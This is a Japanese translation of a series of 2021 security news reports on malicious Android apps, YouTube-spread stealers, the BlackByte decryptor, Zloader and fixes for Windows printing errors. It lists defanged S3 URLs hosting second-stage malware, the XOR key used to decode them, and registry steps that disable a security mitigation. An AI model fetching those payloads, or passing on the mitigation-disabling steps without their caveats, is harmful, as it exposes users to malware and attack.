     このファイルはBase64コードを含み、以下に示すようにLinux ELF(【訳注】 Linux/UNIX プラットフォームにおいて、実行可能プログラムのために文書化されたファイル形式(Trendmicroより))バイナリを同梱している。

    悪意あるアプリケーション内部にELFをパックしたBase64(画像をクリックすると拡大表示されます)

     このELFバイナリは更に、Amazon AWS(【訳注】 アマゾン ウェブ サービス、Amazonのクラウドコンピューティングサービスのこと(Amazonより))インスタンス上にホストされている第二段階のペイロードをダウンロードする。これらのURLは、以下に示す第二段階のペイロードをELF中に含んでいる。

    Smart TV remote app: https://50egvllxk3.s3.eu-west-3.amazonaws[.]com/yr41ajkdp5
    Halloween Coloring app: https://nwki8auofv.s3.sa-east-1.amazonaws[.]com/vl39sbv02d

    AWSサーバからダウンロードされる第二段階のペイロード(画像をクリックすると拡大表示されます)

     BleepingComputerによって確認されたこととして、それら自身を排他的論理和暗号化(XOR-encrypted)したこれらのファイル yr41ajkdp5vl39sbv02d は、これまで主要なアンチウィルスエンジンをもってしても検出されていない。
     但し、XORキー'0x40'でこれらのファイルをデコードすると、APKアーカイブが生成される。本質的に擬似良性である 'Smart TV remote'と'Halloween Coloring'アプリケーションは、Androidデバイスに悪意あるコードをダウンロードするアプリケーションの代表である。
     先月、悪意ある"photo editor"アプリケーションがGoogle Playストア上に存在していることが、 ShishkovaとMaxime Ingrao(モバイル決済サイバーセキュリティ企業Evinaのセキュリティ研究者)によって発見された。
     BleepingComputerは、公開に先立ってGoogle Playに対して'Smart TV remote'と'Halloween Coloring'がマルウェアであると報告している。
     Google Play Protectは、Playストアへのアプリケーションの公開で最初に失敗しているにも拘わらず、まことしやかに、Google Play Protectは、最終的にこれらのアプリケーションを捕獲し、影響を受けるユーザに対して自動的な保護を提供する可能性があるらしい。
     「Google Play Protectはアプリケーションをインストールする時、それらをチェックする。また、定期的にあなたのデバイスをスキャンする。潜在的に有害なアプリケーションが発見された場合には、あなたに通知を送信する... あなたがそのアプリケーションをアンインストールするまで、そのアプリケーションは無効にされる、もしくは、自動的に削除される」とGoogleの公式ドキュメントは述べている。
     それまでの間、これらのアプリケーションの何れかをインストールしたユーザは、直ちにこのアプリケーションをアンインストールし、スマートフォンをクリーンアップし、あらゆる不正な申込み、もしくは、それらのアカウントから発生している請求行為を確認する必要がある。


    日本でAndroidスパイウェアがアンチウィルスソフトとして拡散している
    BleepingComputer : News>Security(2021/10/28)
     FakeCopと呼ばれるAndroid用の情報を盗み取るマルウェアの新しい変種が日本のセキュリティ研究者によって明らかにされた。この研究者は、悪意あるAPKの拡散が加速していると警告している。
     先週、日本のセキュリティ研究者Yusuke Osumiによって最初に発見されたこのマルウェアは、KDDIを装うフィッシング キャンペーンで拡散している。
     更に、このマルウェアはVirusTotalの62のアンチウィルスエンジンの内22でしか検出されていない。これは隠されたままにする脅威のアクターによる一致協力の努力を示している。

     このマルウェアを発見したセキュリティ研究者のTwitterへのリンク

    人気のあるセキュリティツールの仮面を被っている

     サイバーセキュリティ企業Cybleによる新しいレポートに於いて、研究者達は、このマルウェアを'FakeCop'と名付けていた。このマルウェアが日本において人気のあるアンチウィルス'Anshin Security'(あんしんセキュリティ)を装っている。
     このマルウェアを解析した後、この研究者達は、この新しいスパイウェアの変種は以下の能力を持っていると述べている。

      ・ SMS(ショートメッセージサービス)、コンタクト、アカウント情報、アプリケーションリストを収集する
      ・ デバイス データベース中のSMSを改竄もしくは削除する
      ・ デバイス ハードウェア情報(IME)を収集する
      ・ ユーザの認識なしにSMSを送信する

     このスパイウェアは、以下に示したように、この機能を実行するために多数の重要なパーミッションを承認するようにユーザに要求する。

    FakeCopによって要求されるパーミッション(画像をクリックすると拡大表示されます)

     ユーザがアンチウィルスソフトによってこのような要求に遭遇した時、彼らは、セキュリティソフトは一般的にスキャンし検出された脅威を削除するためにより高い権限を必要とするために、ほぼ間違いなくこのような要求を承認する。

    検出の回避を企てている

     このマルウェアの製作者は、静的検出を阻止しながら、彼らのアプリケーションの実際の挙動を隠蔽するために専用パッカーを使用している。
     この悪意あるコードは、暗号化されたビット排他的論理和であり、assetsフォルダ中のファイル内に格納されていて、特定のアプリケーション サブクラスによってコールされた場合にのみ解凍される。
     更に、FakeCopは積極的にデバイスアプリケーションリストをスキャンし、何らかのアンチウィルスを発見したなら、それらをアンインストールするようにユーザに通知する。
     このマルウェアがユーザに削除を促すためにハードコードされているアンチウィルス ソリューションは、Anshin Security、McAfee Security、Docomo Anshin Scanが含まれる。

    アンチウィルスツールの存在をチェックするコード(画像をクリックすると拡大表示されます)

     FakeCopが犠牲者に到達する方法に関して、CybleのOSINT(【訳注】オープン・ソース・インテリジェンス(open source intelligence)の略称。諜報活動の一種で、一般に公開され利用可能な情報を情報源に、機密情報等を収集する手法を指す(ニュートン・コンサルティングより))リサーチは、拡散の二つのチャンネルを明らかにした。一つは悪意あるリンクの付いたSMSであり、もう一つは、フィッシング メールに依存するものである。
     拡散メカニズムとして使用される'duckdns.org'フリー ダイナミックDNSは、MedusaやFlubotを拡散させるために今まで使用されていたので、現在のキャンペーンは同じオペレータの可能性がある。
     一般的なルールとして、求めていないSMSやeMailを介して届くURLリンクをクリックしないようにしなさい。また、Google Playストアの外部からAPK(Android application packageの略)ファイルをインストールすることは控えなさい。
    さらに、あなたのデバイス上でGoogle Playプロテクトがアクティブになっていることを定期的にチェックし確認し、新しいアプリをインストールするときには、常にパーミッション リクエストを精査しなさい。


    大規模なマルウェアキャンペーンがYouTubeを使用してパスワードを盗むマルウェアを押し付けようとしている
    BleepingComputer : News>Security(2021/10/21)
     広範なマルウェアキャンペーンがYouTubeビデオに作成され、疑うことを知らない閲覧者にパスワードを盗むトロイの木馬を配布している。
     パスワードを盗むトロイの木馬は、パスワード、アクティブウィンドウのスクリーンショット、クッキー、ブラウザに格納されているクレジットカード、FTP認証、脅威のアクターによって決定された任意のファイルを盗むために、コンピュータ上で静かに実行されるマルウェアである。
     インストールされると、このマルウェアはコマンド&コントロールサーバと双方向に通信する。コマンド&コントロールサーバとは、攻撃者によって、追加のマルウェアの実行を伴うコマンドが実行されることを待っている場所である。

    悪意あるYouTubeビデオの狂乱

     脅威のアクターは、ビデオ デスクリプションに埋め込んだリンクを介してマルウェアを拡散するための方法として長きに渡りYouTubeビデオを使用している。
     しかしながら今週、Cluster25のセキュリティ研究者Frostは、YouTubeでパスワードを盗むトロイの木馬を押し付ける悪意あるキャンペーンが顕著な上昇を示しているとBleepingComputerに告げた。
     Frostは、これはおそらく、二つのマルウェアのクラスター(RedLineマルウェアと、もう一つはRacoon Stealerを押し付ける)が一斉に実行されたことによるとBleepingComputerに告げた。
     この研究者は、数千のビデオとチャンネルが、この大規模なマルウェアキャンペーンの一部(20分間に100の新しいビデオと81のチャンネルが作成されている)として実行されていると話している。
     Frostは、脅威のアクターは、エンドレスでずっと成長し続けるサイクルを作成するために、彼らが盗んだGoogleアカウントを使用して、マルウェアを拡散するために新しいYouTubeチャンネルを稼働していると説明している。
     「脅威のアクターは毎日新しいクライアントに感染しているので、数千の新しい利用可能なチャンネルを所有している。彼らは攻撃の一部として犠牲者のGoogle認証を盗む。そしてこれは次に、マルウェアを拡散するための新しいYouTubeビデオを作成するために使用される」と、FrostはBleepingComputerに説明している。
     この攻撃は、脅威のアクターが、ソフトウェアクラック、ライセンス、ハウツーガイド、暗号通貨、マイニング、ゲームチート(【訳注】ゲーム著作権の侵害行為)、VPNソフトウェア、他の多くの人気あるカテゴリに関するビデオで満たされた多数のYouTubeチャンネルを作成することで始まる。

    悪意あるYouTubeチャンネルの例(画像をクリックすると拡大表示されます)

     これらのビデオは特定のプログラムやユーティリティを使用してタスクを実行する方法の説明を含んでいる。更に、これらのYouTubeビデオのデスクリプションは、マルウェアを拡散するために使用される関連ツールへのリンクと主張されるものを含んでいる。

    RedLineスティーラを押し付けてくる悪意あるYouTubeビデオ(画像をクリックすると拡大表示されます)

     ビデオにbit.ly(上図参照)リンクが含まれている場合には、パスワードを盗むRedLineマルウェア感染をホストしている別のファイル共有サイトに誘導する。しかしながら、それが短縮されていないドメインを含んでいる場合には、以下に示すように、Racoon Stealerを押し付けてくるtaplink[.]ccのページにリダイレクトされるだろう。

    Racoon Stealer用のランディング ページ(画像をクリックすると拡大表示されます)

     一旦、ユーザが感染させられると、このマルウェアはインストールされている全てのブラウザと暗号通貨のウォレット、クレジットカード、パスワード、他のデータをスキャンすることを続行し、攻撃者にこのようなデータを返送する。
     Googleは、このキャンペーンを認識しており、この行為を粉砕するためのアクションをとっているとBleepingComputerに告げている。

     Googleは、このキャンペーンを認識しており、現在この脅威のアクターによる行為をブロックするアクションをとっており、Safe Browsing(【訳注】安全ではないウェブサイトを特定し、ユーザーやウェブサイトの所有者にその有害性を知らせる機能(Googleより))のために全てのリンクにフラグを立てている最中である。いつもどおり、我々は検出方法を改善し、このような脅威のリンクを自動的に同定し停止する新しいツールや機能に投資している。また、ユーザーが、このようなタイプの脅威を認識し、自分自身をさらに保護するために適切なアクションを実行することもまた重要である。-Google

     Googleはまた今週、YouTubeクリエイターの盗難アカウントを使用したパスワードを盗むトロイの木馬を拡散させるフィッシングキャンペーンを公開している。これらのアカウントは次に、ダークWebマーケットで販売されたり、暗号通貨スカムを実行するために使用されている。

    ソフトウェアのダウンロードは危険である

     これらのキャンペーンは、YouTubeのようなサイトがビデオ発行者によって追加された全てのリンクを精査できるわけではないので、インターネットから手当たりしだいにプログラムをダウンロードしないことがいかに重要であるかを示している。
     それ故、ユーザは、そのサイトから何かをダウンロードしインストールする前にそのサイトを検証し、評判が良く信頼できるか否かを決定する必要がある。それでも、そのプログラムを実行しても安全か否かを確認するために、最初にVirusTotalのようなサイトに、そのプログラムをアップロードすることが常に提案されている。
     偶、この攻撃の餌食になり、類似のリンクからプログラムをインストールさせられた場合には、アンチウィルス プログラムでコンピュータをスキャンすることが強く推奨される。
     ウィルススキャンで検出されたあらゆるマルウェアを削除した後、直ちにブラウザに保存してある全てのパスワードを変更する必要がある。


    研究者は身代金要求型マルウェアのコード中の欠陥を発見したと発言した後、BlackByteの復号プログラム(無料)をリリースした
    Graham Cluley : News(2021/10/19)
     見出しは毎日身代金要求型マルウェアに関する悪いニュースがほとんどだが、偶には良いニュースがある。
     Trustwaveのセキュリティ エキスパートはBlackByte身代金要求型マルウェアの犠牲者が、彼らのファイルを復号し復元するために使用することのできる無料の復号ツールをリリースした。そう、身代金を支払う必要はない。
     彼らのSpiderLabsブログへの一連の投稿に於いて、TrustwaveのRodel MendrezとLloyd Macrohonは、BlackByte身代金要求型マルウェアの暗号化アルゴリズム中に存在する「奇妙」な設計決定を明らかにしたと説明している。

     各セッションに一意のキーをもたせる他の身代金要求型マルウェアと異なり、BlackByteはファイルを暗号化するために同じRaw Keyを使用しており、対照鍵アルゴリズム(AES)を使用している。ファイルを復号するには、ただ、そのホストからRaw Keyをダウンロードする必要があるだけである。ダウンロードした .PNGファイルが同じである限り、我々は、この同じキーを使用して暗号化されたファイルを復号することができる。

     身代金要求型マルウェアのギャングが企業犠牲者のデータを暗号化する前に、そのデータを盗み、身代金が支払われない場合には他のオンライン犯罪者に販売すると主張することは珍しいことではない。
     BlackByteもこの点では違いはない、そして犠牲者はダークWeb上のサイトにリダイレクトされる。そこは、彼らのデータがオンラインオークションに掛けられるために準備されているように思われる。

    (画像をクリックすると拡大表示されます)

     しかし、このセキュリティ研究者によると、この身代金要求型マルウェアは、データを盗み出すための如何なる機能も含んでいない。そして、この主張は、犠牲者を脅して支払わせるためだけの可能性がある。
     Trustwaveの無料復号ツールは、この身代金要求型マルウェアの設計上の弱点を利用したと主張し、GitHubからダウンロードすることができる。
     予想通り、BlackByte身代金要求型マルウェアのギャングは、Trustwaveの復号化ツールのリリースに対応し、被害者に使用しないよう警告するメッセージをWebサイトに公開した。

    (画像をクリックすると拡大表示されます)

     我々の身代金要求型マルウェアの復号を幾つかの場所で発見した。我々は、あなた方がそれを使用することを推奨しない。それは、我々は一つのキーだけを使用しているわけではないからである。あなた方のシステムで間違ったキーを使用した場合には、全てのものが破壊されるだろう。そして、あなた方はシステムを二度と復元することは出来ない。あなた方に警告する。この復号プログラムを使用することを決定したなら、あなた方自身がリスクを背負わなければならない。

     ありがとうSpiderLabs”(別名ClownLabs)、あなた方の所為で、多くのシステムが破壊され、あらゆる復元のチャンスを失うだろう。

     あなたのコンピュータに感染し、次に、あなたのデータの健全性を大いに気遣いながら金銭を強要するこの犯罪者はなんて優しいのだろう。言うまでもなく、如何なる復号ツールも、それを実行する前に重要なデータをバックアップする必要がある。


    新しいWindows 10 KB5006670アップデートはネットワーク印刷をできなくする
    BleepingComputer : News>Security(2021/10/15)
     今週リリースされたKB5006670累積アップデートとたのアップデートをインストールした後、Windows 10ユーザとアドミニストレータは、世界規模でネットワーク印刷問題を報告している。
     火曜日、Microsoftは、2021年10月の定例アップデートの一部としてバグとセキュリティ上の脆弱性を修正するWindowsアップデートをリリースした。
     これらのアップデートは、Windows 11用の KB5006674、Windows 10 2004, 20H1, 21H1用の KB5006670、Windows 10 1909用の KB5006667、Windows 8用の KB5006714 を含んでいる。
     KB5006670アップデートをインストールした後、ユーザはネットワーク印刷サービスで印刷することができないと報告している。また、一部のユーザは印刷しようとした時に 0x00000709 もしくは 'Element not found' エラーを受け取っている。
     BleepingComputerのフォーラムトピックの8ページに於いて、Windowsアドミニストレータ達は印刷バグでのフラストレーションを詳しく話し、この問題を解決するには今週のアップデートをアンインストールすることという同じ結論に至っている。
     7月以来、MicrosoftはWindows Print SpoolerのPrintNightmare脆弱性を修正するセキュリティアップデートを定期的にリリースしてきた。
     身代金要求型マルウェアのギャングを含む脅威のアクターは、これらの脆弱性を積極的に悪用しているので、Microsoftは、Point and Print印刷機能を徹底的に変更した。残念ながら、これらの変更は幾つかの脆弱性を修正したが、ネットワーク印刷サーバに対する印刷問題を導いた。
     今週、Microsoftは、CVE-2021-41332CVE-2021-36970 として追跡されるWindows印刷脆弱性に関する更なるセキュリティアップデートをリリースした。
     報告されている問題の殆どは、Windows 10の KB5006670 アップデートに関連しているが、おそらくこれは、Windows 10が、現時点で最も広汎に使用されているWindowsのバージョンだからと思われる。
     同じセキュリティ フィックスが、Windows 10 1909 と Windows 11用にリリースされている。そして、これらのWindowsバージョンでも類似の問題が多分発生するだろう。

    KB5006670ネットワーク印刷問題を修正する方法

     9月の累積アップデートが印刷問題を発生させた時、非アドミニストレータがプリンタドライバをインストールすることを可能にするか、'RpcAuthnLevelPrivacyEnabled'レジストリ値を無効にすることによって問題を修正することは可能だった。
     しかしながら、このレジストリキーは10月のアップデートによって発生した問題には最早動作しない。そこで、ユーザは、他の方法を使用してこの問題を修正することが要求されている。
     このBleepingComputerフォーラムトピックは、Windows 10 KB5006670アップデートによって発生したネットワーク印刷問題を解決するための方法に関するWindowsアドミニストレータからの沢山の提案を含んでいる。残念ながら、これらの提案は、このセキュリティアップデートを削除するか、常に上手く行くとは限らないものなので、これらの提案は、この問題を解決する理想的なものではない。
     これらの印刷問題を引き起こしフラストレーションを起こさせているものは、Microsoftの明瞭なガイダンスの欠乏と、Windows印刷機能に対して毎月発生させている沢山の変更にある。
     これらの変更は全てWindows Print Spoolerの様々な脆弱性の側面を解決すると同時に、Windowsアドミニストレータが、印刷問題を修正するか否かを判断する必要のある個々の修正を台無しにしている。
     BleepingComputerは、これら全ての問題を解決するための公式ガイダンスをMicrosoftに問い合わせたが、現時点で回答はない。

    方法 1: KB5006670アップデートをアンインストールする  殆どの一般的な提案は、単純にKB5006670アップデートをアンインストールすることである。そしてこれは、管理者特権でのコマンドプロンプトで以下のコマンドを使用することで実行できる。

    wusa /uninstall /kb:5006670

     しかしながら、このアップデートをアンインストールすることは、74の脆弱性(積極的に悪用されているものを含む)用のセキュリティフィックスを削除するので、これは危険な方法である。

    方法 2: C:\Windows\System32\Win32spl.dllを置き換える  別の方法は、ネットワーク印刷問題を修正する2021年9月のアップデート バージョンにあるWin32spl.dll ファイルを置き換えることが発見されている。

    「KB5006670は、印刷を停止するC:\Windows\System32\Win32spl.dllのバージョン10.0.19041.1288に置き換える。
     このDLLを9月の累積アップデートでインストールされたバージョン10.0.19041.1237に置き換える。
     この添付されたバッチスクリプトは、これを実行した各コンピュータにサーバ ロケーションから適切なDLLファイルをコピーし、印刷問題を発生するDLLをリネームする。私は簡単に起動スクリプトとして実行した」

     このDLLは、おそらくセキュリティアップデートの一部を変更するので、これもまた将来可能な脆弱性の悪用に対する防御の減退が、あなたのコンピュータに発生するだろう。

    方法 3: プリントサーバにプリンタキューを再作成する  一部のユーザは、プリントサーバに彼らのプリンタを削除し、再インストールすることで問題が解決されたと報告している。
     アドミニストレータとして、プリンタを削除し再インストールすると、このキューは再構築される。もしかすると、再び印刷が動作する可能性がある。
     しかしながら、ワークステーションは、新しいプリンタキューを使用するために再設定を必要とする可能性がある。これは、一部の組織にとっては多くの時間を消費する業務になる可能性がある。

    方法 4: CopyFiles機能を再び有効にする  最後に、ヒューレットパッカードの一部のプリンタドライバはCopyFiles機能を要求する。これは、Microsoftが9月にDefaultで無効にしている。
     この機能を依然として必要としているユーザのために、この機能を再び有効にすることができるようにMicrosoftは非表示のGroup Policyを導入している。
     Copy Files機能を有効にするにはHKLM\Software\Policies\Microsoft\Windows NT\Printersの下に、CopyFilesPolicyと名付けたキーを作成し、Windowsレジストリの値を作成する。この値を"1"に設定すると、Copy Filesは再び有効になる。


    Google Play上に存在しているAndroidアプリケーションPhoto editorはマルウェアである
    BleepingComputer : News>Security(2021/10/12)
     注意: このアプリケーションは、BleepingComputerがPlayストアを介してGoogleに通知した後、直ちに削除された。

     Google Playストアで客引きしているAndoroidアプリケーションは、それ自体は画像編集ソフト(以下、Photo Editor)である。しかし、このアプリケーションはFacebook認証情報とユーザの支払い情報を盗み、ユーザの代わりに広告キャンペーンを実行する可能性のあるコードと含んでいる。
     このアプリケーションは"Blender Photo Editor-Easy Photo Background Editor"と名付けられており、これまでに5,000回以上インストールされている。
     先週、500,000回以上インストールされている類似の悪意あるアプリケーションもまた、Play Storeで発見されている。

    Facebookでのログインは、ログインだけではない

     多くのAndroidアプリケーションの様に、"Blender Photo Editor-Easy Photo Background Editor"アプリケーションもFacebook機能付きのサインインを備えている。ただし、Fecebook認証情報を利用して何らかの悪事を働く。
     KasperskyのAndoroidマルウェアのアナリストTatyana Shishkovaは、今週(記述している時点で)Google Playストア上で利用可能なままになっている「トロイの木馬」アプリケーションを発見した。

    AndroidアプリケーションでGoogle Play上に居座るPhoto Editor(画像をクリックすると拡大表示されます)

     このアプリケーションには、Evina(モバイル決済サイバーセキュリティ企業)のセキュリティ研究者であるMaxime Ingraoが、先週類似の"photo editor"アプリで発見したものと同じ悪意のあるコードが含まれていた。
     これらのAndroidアプリケーションは、AndroidユーザにFacebookアカウントを介してサインインし、これらのアプリケーションにアクセスするように要求している。しかし次に、暗黙のうちに、このアプリケーション中に隠されている暗号化されたJavaScriptコマンドを介して認証情報が収集される。
     次に、このアプリケーションは、ユーザのFacebookアカウントを覗き見し、あらゆる広告キャンペーンを探すためにFacebook Graph APIへのリクエストを実行し、そして格納されている支払い情報を盗む。
     Ingraoによると、このマルウェアは「あなたが行った可能性のある広告キャンペーンと、登録済みのクレジットカードを持っているか否かに非常な関心を示している」。 これは、これらのアプリケーションの背後にいる攻撃者が、ユーザーのFacebook認証情報、および関連する支払い情報を介して独自の広告キャンペーンの作成が可能である。

    同様のアプリケーションは500,000回以上インストールされている

    Ingraoは以前、 "Magic Photo Lab - Photo Editor"と"Pix Photo Motion Edit 2021"と呼ばれる類似の悪意あるアプリケーションを発見しており、後者は500,000インストールされている。
     この二つのアプリケーションは、既にGoogle Playストアから削除されている。

    Google Playストアで50万回以上ダウンロードされた悪意あるAndroidアプリケーション(画像をクリックすると拡大表示されます)

     この研究者は、これらのアプリケーションが不正であることを発見した方法に関してBleepingComputerと見識の一部を共有した。
     Ingrao(フランスのセキュリティ研究者)は、eMailインタビューに於いてBleepingComputerに対して「私は最初に、動的解析を実行することによって疑わしいコードに気がついた」と、続けて「私はWebViewが認証情報を取得するためにJavaScriptを実行することに気がついた。次に、コードをダウンロードしコード内部のテキストを復号する関数をコーディングし直した。これが実行されたJavaScriptとFacebook Graph APIコールを発見した方法である」と述べている。
     BleepingComputerはまた、依然としてGoogle Playに存在している"Blender Photo Editor-Easy Photo Background Editor"用のAPK(Android Programing Package)を解析した。そして、このアプリケーション中に同じ悪意あるコードを確認した。
     我々が解析している間に、我々はコンパイルされたAPK(Java仮想マシンの命令セット)からAndroidアプリケーションのJavaソースコードをザッと再構築することを企てた。
     この疑わしいクラス"sources/com/easyblender/blendphoto/Blends/ext/AnaActivity.java"は、Ingraoによって言及されたWebViewを含んでいる。更に、我々は、m.facebook.comやm.fb.comドメインを参照する "m.face" や "m.f" のような部分文字列に気がついた
     様々な場所に於いて難読化されたコードは、このアプリケーションが実行されている最中にのみ復号されるJavaScriptコードと共に暗号化された文字列を含んでいる。Facebook APIに対して本物であることを証明するためにユーザのFacebookの"access_token"を入手し、"c_user"のようなFacebookセッションクッキーにアクセスするようにコード中で指示している。そして、これらの全ては、通常の"Sign-in with Facebook"ワークフローの一部として表示される可能性がある。

    このアプリケーション内部で発見された難読化の様々なインスタンスと暗号化されたコード(画像をクリックすると拡大表示されます)

     しかし、実行時に、Ingraoによって発見された以下のJavaScriptコードは、追加のスパイを実行する。このアプリケーションによって起動されたWebViewは、このJavaScriptコードを実行し、ユーザーが入力したFacebookの認証情報を取得する。
     そしてこれは、FacebookのGraph APIに対する前述のリクエストが実行されたときであり、ユーザーのアカウント中に存在するFacebook広告キャンペーンと関連する支払い情報を覗き込む。

    実行時に復号される悪意あるJSコード(画像をクリックすると拡大表示されます)

     Androidユーザーは、最近GooglePlayストアで見られるこのような"Photo Editor"アプリケーションに注意する必要がある。このようなアプリを既にインストールしている人達は、即座にこのアプリケーションをアンインストールし、スマートフォンをクリーンアップし、Facebookの認証情報をリセットする必要がある。


    Brother製USB接続プリンタ、Windows11で稼働しない可能性(2021/10/14)
     タイトルの通り、Brother製USB接続プリンタが、Windows11で稼働しない可能性が発表されています。以下のサイトを確認してください。
     Brotherホームページ(和文): https://support.brother.co.jp/j/b/oscontents.aspx?ossid=14
     Brotherホームページ(英文): https://help.brother-usa.com/app/answers/detail/a_id/175628


    Windows 0x0000011b ネットワーク プリント エラーの修正方法
    BleepingComputer : News>Security(2021/09/20)
     1月にリリースされ、今月完全に施行されたWindowsセキュリティアップデートは、Windowsユーザがネットワーク プリンタで印刷している時に 0x0000011b エラーを発生させている。
     2021年01月に、MicrosoftはCVE-2021-1678として追跡される'Windows Print Spooler Spoofing Vulnerability'を修正するためのセキュリティ アップデートをリリースした。
     「セキュリティがバイパスされる脆弱性は、Printer Remote Procedure Call (RPC)バインドがリモート Winspoolインターフェイスの認証を処理する方法中に存在している」と、この脆弱性に関するサポート ブレティンは説明している。
     セキュリティ アップデートがリリースされた時、このアップデートは、デバイスをこの脆弱性から自動的に保護しなかった。しかしながら、管理者が、ネットワーク プリンティングが使用するRPC認証レベルを増大するために新たなレジストリキーを追加することで、この脆弱性を軽減できた。
     言い換えれば、このセキュリティ アップデートは、Windows管理者が、以下のレジストリキーを作成した場合を除き、脆弱性を修正していなかった。

    [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print]"RpcAuthnLevelPrivacyEnabled"=dword:00000001

     しかし、今月9月14日の定例のセキュリティアップデートで、Microsoftは、このレジストリ設定が作成されていない場合も含め、全てのWindowsデバイスにこの設定をDefaultで有効にした。
     この軽減策をDefaultで有効にしたことで、ネットワークプリンタで印刷している時に、Windowsユーザは、 0x0000011b エラーを受け取ることが始まった
     この印刷エラーは、WindowsドメインのKerberos(【訳注】ネットワークを通じてコンピュータ間で利用者の認証を行う方式の一つ。複数のサーバで共通に認証情報を利用することができ、通信経路を暗号化して認証情報を安全に送受信することができる(IT用語辞典より))セットアップを利用できない中小企業やホームネットワークで主に見られる。
     9月のWindowsセキュリティアップデートをアンインストールするとこの問題は修正されるが、それに伴い、そのデバイスは、脅威のアクターが積極的に脆弱性攻撃している二つの脆弱性(PrintNightmareMSHTML)を開くことになる。
     より良い方法は、Microsoftが新しいガイダンスを公表するまで、CVE-2021-1678用の軽減策を無効にすることである(この脆弱性は、積極的に攻撃されていないので)。

    0x0000011b 印刷エラーの修正方法

     現在のWindowsアップデート(KB5005565)を削除せずに 0x0000011b 印刷エラーを修正するには、今月Defaultで有効にされたCVE-2021-1678軽減策を無効にすることである。
     これを実行するには、Windowsレジストリ エディタを開き、 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print keyに移動する。次に、新しくRpcAuthnLevelPrivacyEnabledという名前でDWORD-32bit値を作成し、0に設定する。レジストリファイルは以下のようになる。

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print]"RpcAuthnLevelPrivacyEnabled"=dword:00000000

     より簡単にこの変更を追加するには、あなたに代わって追加してくれる fix-0x0000011b.reg レジストリ ファイルを使用することができる。
     あなたのプリント サーバと、それに接続しているあなたのWindowsデバイスの両方にこのファイルをダウンロードし、このファイル上をダブルクリック、そして、このデータを統合することを許可しなさい。

    無効化されたRpcAuthnLevelPrivacyEnabled軽減策(画像をクリックすると拡大表示されます)

     この軽減策を無効化すると、もはやこの脆弱性は保護されない。しかし、再び印刷は可能になる。
     これが、あなたの問題を解決しない場合には、enable-RpcAuthnLevel.reg を使用してWindowsのDefaltに戻しなさい。


    新しいZloader攻撃は検出を回避するためにWindows Defenderを無効にしている
    BleepingComputer : News>Security(2021/09/14)
     現在進行中のZloader作戦は、検出を回避するために犠牲者のコンピュータ上のMicrosoft Defender Antivirus(以前のWindows Defender)を無効にする新しい感染チェーンを使用している。
     Microsoftの統計によれば、Microsoft Defender Antivirusは、実行されている10億を超えるシステムにプレインストールされているアンチマルウェア ソフトである。
     攻撃者達は、このマルウェアの拡散方法をスパムやeMailから、ターゲットをインチキのダウンロードサイトにリダイレクトするために、Google Adwordsを介して公開されるTeamViewer Google広告に変更している。
     そこから、ターゲットにされた人たちは、彼らのコンピュータにZloaderマルウェア ペイロードをインストールするように署名され設計された悪意あるMSIインストーラをダウンロードするように欺かれる。
     「この調査で解析されたこの攻撃チェーンは、ステルス性のより高いレベルに到達し、この攻撃の複雑さがどのように成長したかを示している」と、SentinelLabsのセキュリティ研究者Antonio PirozziとAntonio Cocomazziは本日公開されたレポートで述べている。
     「第一段階のドロッパーは、古典的な悪意あるドキュメントからステルスで署名付きのMSIペイロードに変更された。これは、防御を損ないペイロードの実行を代行させるためにバックドア化されたバイナリと一連のLOLBASを使用する。」

    Zloader攻撃チェーン(画像をクリックすると拡大表示されます)

    この攻撃はオーストラリアとドイツの銀行顧客に焦点を当てている

     Zloader(TerdotやDELoaderとしても知られる)は、本来はバンキング トロイであり、幾つかの英国金融機関の顧客をターゲットにした攻撃に使用された2015年08月に発見された。
     Zeus PandaFloki Botのように、このマルウェアは10年ほど前にソースコードがオンラインにリークされた Zeus v2 Trojanにほぼ完全に基づいている。
     オーストラリア、ブラジルから北アメリカに至るまで世界中の銀行をターゲットにしているこのマルウェアは、Webインジェクション(【訳注】正規サイトを表示した際に、偽表示を付け加えて情報を詐取する手法(Trend Micro is702より))を介して金融データを収穫しようとし、認証コードと資格情報を手渡すように感染した顧客を説得するためにソーシャルエンジニアリングを使用する。
     最近では、RyukEgregorのような身代金要求型マルウェアのペイロードを拡散するために使用している。Zloaderはまた、バックドアとリモートアクセス機能と共に出現した。また、感染したデバイス上に更なるペイロードをドロップするためにマルウェエア ローダとして使用することもできる。
     SentinelLabsの調査によると、この最新のキャンペーンは、ドイツとオーストラリアの金融機関の顧客を基本的にターゲットにしている。
     「ZLoaderキャンペーンで、この攻撃チェーンを観察したのはこれが初回である」と、SentinelLabsの研究者は結論付け、「記述している時点で、我々は、拡散チェーンが特定のアフィリエイトによって実装されているのか、あるいは、メインのオペレータによって提供されているのか否かの証拠を持っていない」と述べている。
     2020年の初めから、彼らがMalsmokeと名付けたこの悪意ある広告キャンペーンを追跡しているMalwaerBytesは、脅威のアクターがアダルトをテーマにしている悪意あるサイトを介してFallout脆弱性攻撃キットを使用してSmoke Loaderマルウェア ドロッパーで彼らのターゲットに感染しているのを見つけた。
     セキュリティ研究者nao_secによると、彼らは2021年8月末から、Discord、TeamViewer、Zoom、QuickBooksを模倣したサイトに切り替えており、個人ではなく企業をターゲットにしていると思われる。


    ボットネットはRealtek SDKを使用している数十万のデバイスをターゲットにしている
    BleepingComputer : News>Security(2021/08/23)
     MiraiをベースとするボットネットはRealtekベースの数十万のデバイスに使用されているソフトウェアSDK中の緊急の脆弱性を、今ターゲットにしている。これはAsus, Belkin, D-Link, Netgear, Tenda, ZTE, Zyxelを含む少なくとも65のベンダからの200モデルを含んでいる。
     IoT Inspectorセキュリティ研究者が発見したこのセキュリティフローは、現在CVE-2021-35395として追跡され、緊急度10段階のうち9.8が割り当てられている。
     レジデンシャル ゲートウェイ、トラベルルータから、Wi-Fiリピータ、IPカメラ、スマート照明ゲートウェイ、ネットに接続可能なおもちゃに至るまでインターネットに晒されている多くのワイアレスデバイスに影響を与える

    攻撃は一般公開後、僅か2日で始まった

     このバグは管理Webインターフェースに影響を与えるので、リモート攻撃者は、スキャンし、ハッキングを試み、パッチが適用されていないデバイスに対して任意のコードをリモードで実行し、影響を受けるデバイスを乗っ取ることが可能になる。
     Realtekは、この脆弱性のあるSDKのパッチしたバージョンを08月13日にリリースしたが、IoT Inspectorセキュリティ研究者が、彼らのアドバイザリを公開する前の3日間に脆弱なデバイスの所有者が、このパッチを適用するにはあまりにも時間がなかった。
